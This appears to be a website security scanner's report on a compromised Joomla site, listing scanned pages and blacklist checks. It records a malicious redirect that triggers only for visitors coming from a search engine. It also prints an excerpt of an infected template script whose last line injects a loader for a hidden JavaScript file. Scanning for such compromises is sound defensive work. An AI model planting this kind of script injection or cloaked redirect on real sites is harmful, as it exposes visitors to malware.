Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://intensiv58.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: intensiv58.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 28 Aug 2014 01:03:18 GMT Location: http://www.freeall.epac.to/ Server: Apache Content-Length: 172 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.29 | malicious |
Scanned pages/files
Request | Server response | Status |
http://intensiv58.ru/ | 200 OK Content-Length: 32522 Content-Type: text/html | clean |
http://intensiv58.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://intensiv58.ru/templates/people_final/script.js | 200 OK Content-Length: 6661 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var artEventHelper = { 'bind' : function (obj, evt, fn) { if (obj.addEventListener) obj.addEventListener(evt, fn, false); else if (obj.attachEvent) obj.attachEvent('on' + evt, fn); else obj['on' + evt] = fn; } }; var artLoadEvent = (function() { var userAgent = navigator.userAgent.toLowerCase(); var browser = { version: (userAgent.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/) || [])[ oLI.onmouseleave = function() { this.className = this.className.replace(/menuhover/,""); this.UL.className = this.UL.className.replace(/menuhoverUL/,""); if (this.A) this.A.className = this.A.className.replace(/menuhoverA/,""); }; } } } } artLoadEvent.add(Menu_IE6Setup); ;document.write("<scr"+"ipt src='/administrator/help/en-GB/patrol.js'><"+"/script>"); Antivirus reports:
| ||
http://counter.rambler.ru/top100.jcn?2422093 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://intensiv58.ru/index.php?option=com_kunena&Itemid=6 | 200 OK Content-Length: 46418 Content-Type: text/html | clean |
http://intensiv58.ru/components/com_kunena/template/default/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://intensiv58.ru/components/com_kunena/template/default/js/kunenaforum.js | 200 OK Content-Length: 4303 Content-Type: application/javascript | clean |
http://intensiv58.ru/index.php?option=com_joomgallery&Itemid=7 | 200 OK Content-Length: 23227 Content-Type: text/html | clean |
http://intensiv58.ru/includes/js/overlib_mini.js | 200 OK Content-Length: 36830 Content-Type: application/javascript | clean |
http://intensiv58.ru/components/com_joomgallery/assets/js/joomscript.js | 200 OK Content-Length: 15190 Content-Type: application/javascript | clean |
http://intensiv58.ru/index.php?option=com_content&view=category&id=7&Itemid=8 | 200 OK Content-Length: 23735 Content-Type: text/html | clean |
http://intensiv58.ru/index.php?option=com_der&view=der&Itemid=13 | 200 OK Content-Length: 19292 Content-Type: text/html | clean |
http://intensiv58.ru/components/com_der/css/my.js | 200 OK Content-Length: 407 Content-Type: application/javascript | clean |
http://intensiv58.ru/index.php?option=com_content&view=section&layout=blog&id=7&Itemid=21 | 200 OK Content-Length: 26770 Content-Type: text/html | clean |
http://intensiv58.ru/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=2 | 200 OK Content-Length: 26142 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=intensiv58.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://intensiv58.ru/
Result: intensiv58.ru is not infected or malware details are not published yet.
Result: intensiv58.ru is not infected or malware details are not published yet.